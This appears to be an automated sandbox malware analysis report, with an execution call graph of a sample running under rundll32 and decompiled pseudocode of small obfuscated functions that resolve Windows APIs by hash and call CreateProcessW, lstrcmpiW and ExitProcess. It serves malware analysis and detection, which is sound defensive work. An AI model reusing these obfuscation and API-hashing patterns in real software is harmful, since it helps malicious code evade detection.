4819->4502 4821 2ff28bc 4820->4821 4822 2fee399 GetPEB 4821->4822 4823 2ff2963 4822->4823 4823->4502 4826 2fdb82a 4824->4826 4828 2fdbe34 4826->4828 4830 2ff0ad3 GetPEB 4826->4830 4832 2ff06a6 GetPEB 4826->4832 4833 2fe2eed GetPEB 4826->4833 4834 2fdb7ec GetPEB 4826->4834 4835 2fe8804 4826->4835 4839 2fd18ac 4826->4839 4843 2fdf324 4826->4843 4847 2ff2729 4826->4847 4828->4510 4830->4826 4832->4826 4833->4826 4834->4826 4836 2fe8825 4835->4836 4837 2fddfb1 GetPEB 4836->4837 4838 2fe8841 4837->4838 4838->4826 4840 2fd18c5 4839->4840 4841 2fee399 GetPEB 4840->4841 4842 2fd1960 4841->4842 4842->4826 4844 2fdf33a 4843->4844 4845 2fee399 GetPEB 4844->4845 4846 2fdf3e8 4845->4846 4846->4826 4848 2ff273c 4847->4848 4849 2fee399 GetPEB 4848->4849 4850 2ff27d7 4849->4850 4850->4826 4854 2ff1add 4851->4854 4852 2ff1b11 4852->4519 4853 2fdf14f GetPEB 4853->4854 4854->4852 4854->4853 4855 2fd24aa GetPEB 4854->4855 4856 2ff1af9 4854->4856 4855->4854 4858 2fde112 4856->4858 4859 2fde129 4858->4859 4860 2fee399 GetPEB 4859->4860 4861 2fde1dc 4860->4861 4861->4852 4863 2fd2fe1 4862->4863 4864 2fee399 GetPEB 4863->4864 4865 2fd3079 4864->4865 4865->4534 4867 2fd8870 4866->4867 4868 2fee399 GetPEB 4867->4868 4869 2fd8900 4868->4869 4869->4538 4871 2fd37d2 4870->4871 4872 2fee399 GetPEB 4871->4872 4873 2fd385b 4872->4873 4873->4541 4885 2ff20f8 4874->4885 4878 2fee49c 4877->4878 4907 2fe5ab8 4878->4907 4881 2fee5fa 4881->4545 4884 2fe9038 GetPEB 4884->4881 4892 2ff211d 4885->4892 4886 2fe9038 GetPEB 4886->4892 4889 2fed5f5 4889->4545 4892->4886 4892->4889 4893 2febef1 4892->4893 4897 2fe7d2d 4892->4897 4901 2fdef64 4892->4901 4904 2fd3df4 4892->4904 4894 2febf0a 4893->4894 4895 2fee399 GetPEB 4894->4895 4896 2febf93 4895->4896 4896->4892 4898 2fe7d46 4897->4898 4899 2fee399 GetPEB 4898->4899 4900 2fe7e03 4899->4900 4900->4892 4902 2fee399 GetPEB 4901->4902 4903 2fdf015 4902->4903 4903->4892 4905 2fd8cbc GetPEB 4904->4905 4906 2fd3e20 4905->4906 4906->4892 4908 2fee399 GetPEB 4907->4908 4909 2fe5b63 4908->4909 4909->4881 4910 2fddeff 4909->4910 4911 2fddf20 4910->4911 4912 2fee399 GetPEB 4911->4912 4913 2fddf9e 4912->4913 4913->4884 4915 2fd9235 4914->4915 4916 2fee399 GetPEB 4915->4916 4917 2fd92d1 4916->4917 4917->4550 4919 2feecef 4918->4919 4920 2fee399 GetPEB 4919->4920 4921 2feed83 4920->4921 4921->4550 4923 2fe606b 4922->4923 4924 2fd3965 GetPEB 4923->4924 4925 2fe62e9 4924->4925 4926 2fd3965 GetPEB 4925->4926 4927 2fe6307 4926->4927 4928 2fd3965 GetPEB 4927->4928 4929 2fe6320 4928->4929 4930 2fde112 GetPEB 4929->4930 4931 2fe6338 4930->4931 4932 2fde112 GetPEB 4931->4932 4933 2fe634c 4932->4933 4940 2fe828a 4933->4940 4937 2fd8c92 4936->4937 4938 2fddfb1 GetPEB 4937->4938 4939 2fd8cb4 4938->4939 4939->4565 4941 2fe829d 4940->4941 4942 2fee399 GetPEB 4941->4942 4943 2fe6385 4942->4943 4943->4561 4948 2fd62e0 4944->4948 4945 2fd6353 4945->4568 4946 2ff37b6 GetPEB 4946->4948 4947 2fdf699 GetPEB 4947->4948 4948->4945 4948->4946 4948->4947 4950 2fe9038 GetPEB 4948->4950 5034 2fdfa7d 4948->5034 4950->4948 4952 2fe749b 4951->4952 4953 2ff06ef 2 API calls 4952->4953 4954 2fd24aa GetPEB 4952->4954 4955 2fe75df 4952->4955 4956 2fe0f17 GetPEB 4952->4956 4957 2fecc3f GetPEB 4952->4957 4958 2ff0ad3 GetPEB 4952->4958 4959 2ff06a6 GetPEB 4952->4959 4960 2fe2eed GetPEB 4952->4960 4961 2ff3306 GetPEB 4952->4961 4953->4952 4954->4952 4955->4568 4956->4952 4957->4952 4958->4952 4959->4952 4960->4952 4961->4952 4968 2fd9847 4962->4968 4964 2fd994e 4965 2fdfa7d GetPEB 4964->4965 4967 2fd994c 4965->4967 4966 2fd37ad GetPEB 4966->4968 4967->4568 4968->4964 4968->4966 4968->4967 5042 2fd68ad 4968->5042 5050 2fe834f 4968->5050 5063 2fdadfc 4970->5063 4972 2fde259 GetPEB 4988 2fe27d8 4972->4988 4974 2ff06ef 2 API calls 4974->4988 4975 2fd7739 GetPEB 4975->4988 4976 2fe2bda 4976->4568 4977 2fd24aa GetPEB 4977->4988 4978 2fe2bdc 4980 2fe9038 GetPEB 4978->4980 4979 2fdf14f GetPEB 4979->4988 4980->4976 4981 2fd8c65 GetPEB 4981->4988 4982 2fdf699 GetPEB 4982->4988 4984 2fe0f17 GetPEB 4984->4988 4985 2fecc3f GetPEB 4985->4988 4986 2ff0ad3 GetPEB 4986->4988 4987 2ff06a6 GetPEB 4987->4988 4988->4972 4988->4974 4988->4975 4988->4976 4988->4977 4988->4978 4988->4979 4988->4981 4988->4982 4988->4984 4988->4985 4988->4986 4988->4987 4989 2fe2eed GetPEB 4988->4989 4990 2ff3306 GetPEB 4988->4990 5066 2fe8727 4988->5066 5070 2fe7edd 4988->5070 4989->4988 4990->4988 4998 2fed389 4991->4998 4992 2fd68ad GetPEB 4992->4998 4993 2fed490 4994 2fdfa7d GetPEB 4993->4994 4996 2fed48e 4994->4996 4995 2fd37ad GetPEB 4995->4998 4996->4568 4997 2fe834f GetPEB 4997->4998 4998->4992 4998->4993 4998->4995 4998->4996 4998->4997 5008 2fded6c 4999->5008 5000 2fde259 GetPEB 5000->5008 5001 2fd24aa GetPEB 5001->5008 5002 2fdef59 5002->4568 5003 2fe0f17 GetPEB 5003->5008 5004 2ff06a6 GetPEB 5004->5008 5005 2fecc3f GetPEB 5005->5008 5006 2fe2eed GetPEB 5006->5008 5007 2ff0ad3 GetPEB 5007->5008 5008->5000 5008->5001 5008->5002 5008->5003 5008->5004 5008->5005 5008->5006 5008->5007 5009 2ff06ef 2 API calls 5008->5009 5010 2ff3306 GetPEB 5008->5010 5009->5008 5010->5008 5013 2fd7418 5011->5013 5012 2fd770e 5014 2fe9038 GetPEB 5012->5014 5013->5012 5016 2ff27e2 GetPEB 5013->5016 5017 2fd7699 5013->5017 5020 2fd24aa GetPEB 5013->5020 5024 2fe0f17 GetPEB 5013->5024 5027 2fecc3f GetPEB 5013->5027 5028 2fe9038 GetPEB 5013->5028 5029 2fd7694 5013->5029 5030 2ff0ad3 GetPEB 5013->5030 5031 2ff06a6 GetPEB 5013->5031 5032 2fe2eed GetPEB 5013->5032 5033 2ff3306 GetPEB 5013->5033 5076 2fe473a 5013->5076 5086 2fd576b 5013->5086 5089 2fd7d87 5013->5089 5014->5029 5016->5013 5018 2ff06ef 2 API calls 5017->5018 5019 2fd76c9 5018->5019 5023 2fe9038 GetPEB 5019->5023 5019->5029 5020->5013 5025 2fd76e8 5023->5025 5024->5013 5026 2fe9038 GetPEB 5025->5026 5026->5029 5027->5013 5028->5013 5029->4568 5030->5013 5031->5013 5032->5013 5033->5013 5035 2fdfa90 5034->5035 5038 2fd5c45 5035->5038 5039 2fd5c5d 5038->5039 5040 2fee399 GetPEB 5039->5040 5041 2fd5cfc 5040->5041 5041->4948 5043 2fd68c8 5042->5043 5044 2fd6bf4 5043->5044 5055 2ff05cc 5043->5055 5044->4968 5047 2fe4626 GetPEB 5048 2fd6ba8 5047->5048 5048->5044 5049 2fe4626 GetPEB 5048->5049 5049->5048 5051 2fe836a 5050->5051 5052 2ff308c GetPEB 5051->5052 5053 2fe8509 5051->5053 5059 2ff247c 5051->5059 5052->5051 5053->4968 5056 2ff05ed 5055->5056 5057 2fee399 GetPEB 5056->5057 5058 2fd6b82 5057->5058 5058->5044 5058->5047 5060 2ff2499 5059->5060 5061 2fee399 GetPEB 5060->5061 5062 2ff2551 5061->5062 5062->5051 5064 2fee399 GetPEB 5063->5064 5065 2fdaeb0 5064->5065 5065->4988 5067 2fe8754 5066->5067 5068 2fee399 GetPEB 5067->5068 5069 2fe87e8 5068->5069 5069->4988 5075 2fe7efa 5070->5075 5071 2fe6f53 GetPEB 5071->5075 5072 2fe8180 5074 2fe0824 GetPEB 5072->5074 5073 2fe817e 5073->4988 5074->5073 5075->5071 5075->5072 5075->5073 5081 2fe4781 5076->5081 5078 2fe4c1a 5105 2fdc5da 5078->5105 5079 2fd3965 GetPEB 5079->5081 5081->5078 5081->5079 5082 2fe4c18 5081->5082 5083 2ff0ad3 GetPEB 5081->5083 5085 2fe2eed GetPEB 5081->5085 5097 2fd8003 5081->5097 5101 2fdb058 5081->5101 5082->5013 5083->5081 5085->5081 5087 2fee399 GetPEB 5086->5087 5088 2fd5818 5087->5088 5088->5013 5094 2fd7da8 5089->5094 5091 2fd7fdf 5091->5013 5092 2fd7fe1 5093 2fe9038 GetPEB 5092->5093 5093->5091 5094->5091 5094->5092 5095 2fd576b GetPEB 5094->5095 5109 2fecdc8 5094->5109 5113 2fdfaf1 5094->5113 5095->5094 5098 2fd8040 5097->5098 5099 2fee399 GetPEB 5098->5099 5100 2fd80ef 5099->5100 5100->5081 5102 2fdb06f 5101->5102 5103 2fee399 GetPEB 5102->5103 5104 2fdb11d 5103->5104 5104->5081 5106 2fdc5f0 5105->5106 5107 2fee399 GetPEB 5106->5107 5108 2fdc68f 5107->5108 5108->5082 5110 2fecddf 5109->5110 5111 2fee399 GetPEB 5110->5111 5112 2fece85 5111->5112 5112->5094 5114 2fdfb1b 5113->5114 5115 2fee399 GetPEB 5114->5115 5116 2fdfbd5 5115->5116 5116->5094 5118 2fd5b92 5117->5118 5119 2fee399 GetPEB 5118->5119 5120 2fd5c36 5119->5120 5120->4581 5123 2fda907 5121->5123 5122 2fe2e17 GetPEB 5122->5123 5123->5122 5124 2fe6f53 GetPEB 5123->5124 5125 2fdac3a 5123->5125 5124->5123 5125->4581 5127 2fe2c29 5126->5127 5128 2fee399 GetPEB 5127->5128 5129 2fe2cbe 5128->5129 5129->4581 5131 2fe097c 5130->5131 5132 2fee399 GetPEB 5131->5132 5133 2fe0a2b 5132->5133 5133->4584 5135 2fdaed3 5134->5135 5136 2ff0ad3 GetPEB 5135->5136 5137 2fdb013 5136->5137 5138 2fe8804 GetPEB 5137->5138 5139 2fdb02f 5138->5139 5140 2fe2eed GetPEB 5139->5140 5141 2fdb03e 5140->5141 5142 2fd55c0 GetPEB 5141->5142 5143 2fdb04f 5142->5143 5143->4591 5146 2fd33c8 5144->5146 5145 2fd54c0 GetPEB 5145->5146 5146->5145 5149 2fd36ab 5146->5149 5151 2fe2eed GetPEB 5146->5151 5152 2fe6393 5146->5152 5156 2fddd66 5146->5156 5161 2feae66 5146->5161 5149->4609 5151->5146 5153 2fe63af 5152->5153 5154 2fee399 GetPEB 5153->5154 5155 2fe6451 5154->5155 5155->5146 5165 2feafb0 5156->5165 5160 2fddef4 5160->5146 5162 2feae8b 5161->5162 5163 2fddfb1 GetPEB 5162->5163 5164 2feaea6 5163->5164 5164->5146 5166 2feafcd 5165->5166 5167 2fee399 GetPEB 5166->5167 5168 2fdde9f 5167->5168 5168->5160 5169 2fd8ac1 5168->5169 5170 2fd8af0 5169->5170 5171 2fee399 GetPEB 5170->5171 5172 2fd8b80 5171->5172 5172->5160 5174 2fd8931 5173->5174 5175 2fee399 GetPEB 5174->5175 5176 2fd89d2 5175->5176 5176->4622 5178 2fe1292 5177->5178 5179 2fee399 GetPEB 5178->5179 5180 2fe1319 5179->5180 5180->4625 5182 2fd23c1 5181->5182 5183 2fddfb1 GetPEB 5182->5183 5184 2fd23e7 5183->5184 5184->4643 5186 2ff0a28 5185->5186 5187 2fee399 GetPEB 5186->5187 5188 2ff0ac6 5187->5188 5188->4648 5190 2fe4451 5189->5190 5191 2fee399 GetPEB 5190->5191 5192 2fe44e1 5191->5192 5192->4648 5196 2fe0707 5193->5196 5194 2ff2a25 GetPEB 5194->5196 5195 2ff0ad3 GetPEB 5195->5196 5196->5194 5196->5195 5197 2fd2089 GetPEB 5196->5197 5199 2fe0818 5196->5199 5200 2fe2eed GetPEB 5196->5200 5205 2fd5d0c 5196->5205 5197->5196 5199->4648 5200->5196 5202 2fe885c 5201->5202 5203 2fee399 GetPEB 5202->5203 5204 2fe88fc 5203->5204 5204->4652 5206 2fd5d1f 5205->5206 5207 2fee399 GetPEB 5206->5207 5208 2fd5db4 5207->5208 5208->5196 4343 2fd18a3 4344 2fd18c5 4343->4344 4345 2fee399 GetPEB 4344->4345 4346 2fd1960 4345->4346

                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 63 2fe9100-2fe91f6 call 2fd8002 call 2fee399 CreateProcessW
                                                                                                                                                                                      C-Code - Quality: 41%
                                                                                                                                                                                      			E02FE9100(void* __ecx, WCHAR* __edx, WCHAR* _a8, struct _PROCESS_INFORMATION* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _STARTUPINFOW* _a40, intOrPtr _a44, int _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                      				void* _t52;
                                                                                                                                                                                      				int _t60;
                                                                                                                                                                                      				WCHAR* _t64;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t64 = __edx;
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(_a64);
                                                                                                                                                                                      				_push(_a60);
                                                                                                                                                                                      				_push(_a56);
                                                                                                                                                                                      				_push(_a52);
                                                                                                                                                                                      				_push(_a48);
                                                                                                                                                                                      				_push(_a44);
                                                                                                                                                                                      				_push(_a40);
                                                                                                                                                                                      				_push(_a36);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(_a28);
                                                                                                                                                                                      				_push(_a24);
                                                                                                                                                                                      				_push(_a20);
                                                                                                                                                                                      				_push(_a16);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(_a8);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(__edx);
                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                      				E02FD8002(_t52);
                                                                                                                                                                                      				_v28 = 0x2905a5;
                                                                                                                                                                                      				_v24 = 0;
                                                                                                                                                                                      				_v12 = 0xa2d8b8;
                                                                                                                                                                                      				_v12 = _v12 + 0xfffff871;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x5b121ec8;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x21b4fd5f;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x7a067dbd;
                                                                                                                                                                                      				_v8 = 0x36027e;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x6c06375b;
                                                                                                                                                                                      				_v8 = _v8 * 0x51;
                                                                                                                                                                                      				_v8 = _v8 + 0xffff0cdd;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x3b3a0501;
                                                                                                                                                                                      				_v20 = 0x3133e6;
                                                                                                                                                                                      				_v20 = _v20 ^ 0xa81fc925;
                                                                                                                                                                                      				_v20 = _v20 ^ 0xa82b7027;
                                                                                                                                                                                      				_v16 = 0x47f0fa;
                                                                                                                                                                                      				_v16 = _v16 | 0xed8e49a9;
                                                                                                                                                                                      				_v16 = _v16 ^ 0xedcdbeb4;
                                                                                                                                                                                      				E02FEE399(__ecx, __edx, __ecx, 0xa2449830, 0x53, 0xa9376bff);
                                                                                                                                                                                      				_t60 = CreateProcessW(_t64, _a8, 0, 0, _a48, 0, 0, 0, _a40, _a16); // executed
                                                                                                                                                                                      				return _t60;
                                                                                                                                                                                      			}












                                                                                                                                                                                      0x02fe910a
                                                                                                                                                                                      0x02fe910c
                                                                                                                                                                                      0x02fe910d
                                                                                                                                                                                      0x02fe910e
                                                                                                                                                                                      0x02fe9111
                                                                                                                                                                                      0x02fe9114
                                                                                                                                                                                      0x02fe9117
                                                                                                                                                                                      0x02fe911a
                                                                                                                                                                                      0x02fe911d
                                                                                                                                                                                      0x02fe9120
                                                                                                                                                                                      0x02fe9123
                                                                                                                                                                                      0x02fe9126
                                                                                                                                                                                      0x02fe9127
                                                                                                                                                                                      0x02fe912a
                                                                                                                                                                                      0x02fe912d
                                                                                                                                                                                      0x02fe9130
                                                                                                                                                                                      0x02fe9133
                                                                                                                                                                                      0x02fe9134
                                                                                                                                                                                      0x02fe9137
                                                                                                                                                                                      0x02fe9138
                                                                                                                                                                                      0x02fe9139
                                                                                                                                                                                      0x02fe913a
                                                                                                                                                                                      0x02fe913f
                                                                                                                                                                                      0x02fe9149
                                                                                                                                                                                      0x02fe914c
                                                                                                                                                                                      0x02fe9153
                                                                                                                                                                                      0x02fe915a
                                                                                                                                                                                      0x02fe9161
                                                                                                                                                                                      0x02fe9168
                                                                                                                                                                                      0x02fe916f
                                                                                                                                                                                      0x02fe9176
                                                                                                                                                                                      0x02fe918e
                                                                                                                                                                                      0x02fe9191
                                                                                                                                                                                      0x02fe9198
                                                                                                                                                                                      0x02fe919f
                                                                                                                                                                                      0x02fe91a6
                                                                                                                                                                                      0x02fe91ad
                                                                                                                                                                                      0x02fe91b4
                                                                                                                                                                                      0x02fe91bb
                                                                                                                                                                                      0x02fe91c2
                                                                                                                                                                                      0x02fe91d5
                                                                                                                                                                                      0x02fe91ef
                                                                                                                                                                                      0x02fe91f6

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateProcessW.KERNELBASE(?,EDCDBEB4,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 02FE91EF
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.529712729.0000000002FD0000.00000040.00000010.sdmp, Offset: 02FD0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2fd0000_rundll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                                      • String ID: 31
                                                                                                                                                                                      • API String ID: 963392458-1099231638
                                                                                                                                                                                      • Opcode ID: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
                                                                                                                                                                                      • Instruction ID: ee0af47b8dbd7b8768647ceff8360e3698bfbf9ee1e78a5d2aa5459ebba520a8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A31E272801258BBCF559FA6CD05CDFBFB9FB89750F108158FA1462120C3728A60EFA1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 68 2fe0207-2fe02e8 call 2fd8002 call 2fee399 lstrcmpiW
                                                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                                                      			E02FE0207(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				void* _v32;
                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                      				int _t68;
                                                                                                                                                                                      				signed int _t70;
                                                                                                                                                                                      				signed int _t71;
                                                                                                                                                                                      				signed int _t72;
                                                                                                                                                                                      				WCHAR* _t81;
                                                                                                                                                                                      
                                                                                                                                                                                      				_push(_a16);
                                                                                                                                                                                      				_t81 = __edx;
                                                                                                                                                                                      				_push(_a12);
                                                                                                                                                                                      				_push(_a8);
                                                                                                                                                                                      				_push(_a4);
                                                                                                                                                                                      				_push(__edx);
                                                                                                                                                                                      				E02FD8002(_t54);
                                                                                                                                                                                      				_v36 = 0xa7e4f2;
                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                      				_t70 = 0x7b;
                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                      				_v12 = 0x53fdc4;
                                                                                                                                                                                      				_t71 = 0x5a;
                                                                                                                                                                                      				_v12 = _v12 / _t70;
                                                                                                                                                                                      				_v12 = _v12 << 7;
                                                                                                                                                                                      				_v12 = _v12 ^ 0xe1fe8b09;
                                                                                                                                                                                      				_v12 = _v12 ^ 0xe1ac8480;
                                                                                                                                                                                      				_v20 = 0x744728;
                                                                                                                                                                                      				_v20 = _v20 << 0xf;
                                                                                                                                                                                      				_v20 = _v20 ^ 0x239bcee7;
                                                                                                                                                                                      				_v16 = 0xd5199;
                                                                                                                                                                                      				_v16 = _v16 + 0xffff5a50;
                                                                                                                                                                                      				_v16 = _v16 / _t71;
                                                                                                                                                                                      				_v16 = _v16 ^ 0x000f59f5;
                                                                                                                                                                                      				_v8 = 0xa57c1a;
                                                                                                                                                                                      				_v8 = _v8 | 0x119c25df;
                                                                                                                                                                                      				_v8 = _v8 + 0xffffdcc6;
                                                                                                                                                                                      				_t72 = 0x4f;
                                                                                                                                                                                      				_v8 = _v8 / _t72;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x003b1570;
                                                                                                                                                                                      				E02FEE399(_t72, _v8 % _t72, _t72, 0xa2449830, 0x167, 0xa9a77114);
                                                                                                                                                                                      				_t68 = lstrcmpiW(_a8, _t81); // executed
                                                                                                                                                                                      				return _t68;
                                                                                                                                                                                      			}















                                                                                                                                                                                      0x02fe020f
                                                                                                                                                                                      0x02fe0212
                                                                                                                                                                                      0x02fe0214
                                                                                                                                                                                      0x02fe0217
                                                                                                                                                                                      0x02fe021a
                                                                                                                                                                                      0x02fe021d
                                                                                                                                                                                      0x02fe021f
                                                                                                                                                                                      0x02fe0224
                                                                                                                                                                                      0x02fe0232
                                                                                                                                                                                      0x02fe0235
                                                                                                                                                                                      0x02fe0238
                                                                                                                                                                                      0x02fe0239
                                                                                                                                                                                      0x02fe023a
                                                                                                                                                                                      0x02fe0246
                                                                                                                                                                                      0x02fe0247
                                                                                                                                                                                      0x02fe024c
                                                                                                                                                                                      0x02fe0250
                                                                                                                                                                                      0x02fe0257
                                                                                                                                                                                      0x02fe025e
                                                                                                                                                                                      0x02fe0265
                                                                                                                                                                                      0x02fe0269
                                                                                                                                                                                      0x02fe0270
                                                                                                                                                                                      0x02fe0277
                                                                                                                                                                                      0x02fe0285
                                                                                                                                                                                      0x02fe028a
                                                                                                                                                                                      0x02fe0291
                                                                                                                                                                                      0x02fe0298
                                                                                                                                                                                      0x02fe029f
                                                                                                                                                                                      0x02fe02a9
                                                                                                                                                                                      0x02fe02af
                                                                                                                                                                                      0x02fe02b2
                                                                                                                                                                                      0x02fe02d5
                                                                                                                                                                                      0x02fe02e1
                                                                                                                                                                                      0x02fe02e8

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrcmpiW.KERNELBASE(000F59F5,00000000,?,?,?,?,?,?,?,9B842ACC,01B64447,00000000), ref: 02FE02E1
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.529712729.0000000002FD0000.00000040.00000010.sdmp, Offset: 02FD0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2fd0000_rundll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcmpi
                                                                                                                                                                                      • String ID: (Gt
                                                                                                                                                                                      • API String ID: 1586166983-558867117
                                                                                                                                                                                      • Opcode ID: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
                                                                                                                                                                                      • Instruction ID: f2fd22b1dd90f3ba686737e30acc1736b73a02669dafb042376f0000c988a7ca
                                                                                                                                                                                      • Opcode Fuzzy Hash: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 912178B5E00208FBEF04DFA4CC0A9DEBBB2FB44714F10C199E515AA250D7B65A11DF90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 73 2fdf3f7-2fdf4a4 call 2fee399 ExitProcess
                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                      			E02FDF3F7() {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				signed int _v24;
                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                      				signed int _t47;
                                                                                                                                                                                      
                                                                                                                                                                                      				_v28 = _v28 & 0x00000000;
                                                                                                                                                                                      				_v24 = _v24 & 0x00000000;
                                                                                                                                                                                      				_v36 = 0xb0bfd;
                                                                                                                                                                                      				_v32 = 0x231de0;
                                                                                                                                                                                      				_v20 = 0x822c7a;
                                                                                                                                                                                      				_t47 = 0x31;
                                                                                                                                                                                      				_push(_t47);
                                                                                                                                                                                      				_v20 = _v20 * 0x25;
                                                                                                                                                                                      				_v20 = _v20 ^ 0x12d3a120;
                                                                                                                                                                                      				_v12 = 0x122796;
                                                                                                                                                                                      				_v12 = _v12 | 0x5fffe7f7;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x5ff36a5b;
                                                                                                                                                                                      				_v8 = 0xc53dc4;
                                                                                                                                                                                      				_v8 = _v8 + 0xffff669e;
                                                                                                                                                                                      				_v8 = _v8 + 0xba03;
                                                                                                                                                                                      				_v8 = _v8 + 0x1f9e;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x00c2122b;
                                                                                                                                                                                      				_v16 = 0x5857ad;
                                                                                                                                                                                      				_v16 = _v16 / _t47;
                                                                                                                                                                                      				_v16 = _v16 ^ 0x000b8ebe;
                                                                                                                                                                                      				E02FEE399(_t47, _v16 % _t47, _t47, 0xa2449830, 0x41, 0x9da8748a);
                                                                                                                                                                                      				ExitProcess(0);
                                                                                                                                                                                      			}












                                                                                                                                                                                      0x02fdf3fd
                                                                                                                                                                                      0x02fdf403
                                                                                                                                                                                      0x02fdf407
                                                                                                                                                                                      0x02fdf40e
                                                                                                                                                                                      0x02fdf415
                                                                                                                                                                                      0x02fdf422
                                                                                                                                                                                      0x02fdf423
                                                                                                                                                                                      0x02fdf429
                                                                                                                                                                                      0x02fdf42c
                                                                                                                                                                                      0x02fdf433
                                                                                                                                                                                      0x02fdf43a
                                                                                                                                                                                      0x02fdf441
                                                                                                                                                                                      0x02fdf448
                                                                                                                                                                                      0x02fdf44f
                                                                                                                                                                                      0x02fdf456
                                                                                                                                                                                      0x02fdf45d
                                                                                                                                                                                      0x02fdf464
                                                                                                                                                                                      0x02fdf46b
                                                                                                                                                                                      0x02fdf479
                                                                                                                                                                                      0x02fdf47c
                                                                                                                                                                                      0x02fdf495
                                                                                                                                                                                      0x02fdf49f

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 02FDF49F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.529712729.0000000002FD0000.00000040.00000010.sdmp, Offset: 02FD0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2fd0000_rundll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                                                      • Opcode ID: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
                                                                                                                                                                                      • Instruction ID: 0d5fef3b67506423ceb98c48194498c3bb95d2019c26073ad3a4ec9147d96141
                                                                                                                                                                                      • Opcode Fuzzy Hash: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A11D6B1E1121DEFDF04DFE4D94A6EEBBB4FB14315F108188E521AA250E7B45B558F80
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:4.1%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                      Total number of Nodes:1046
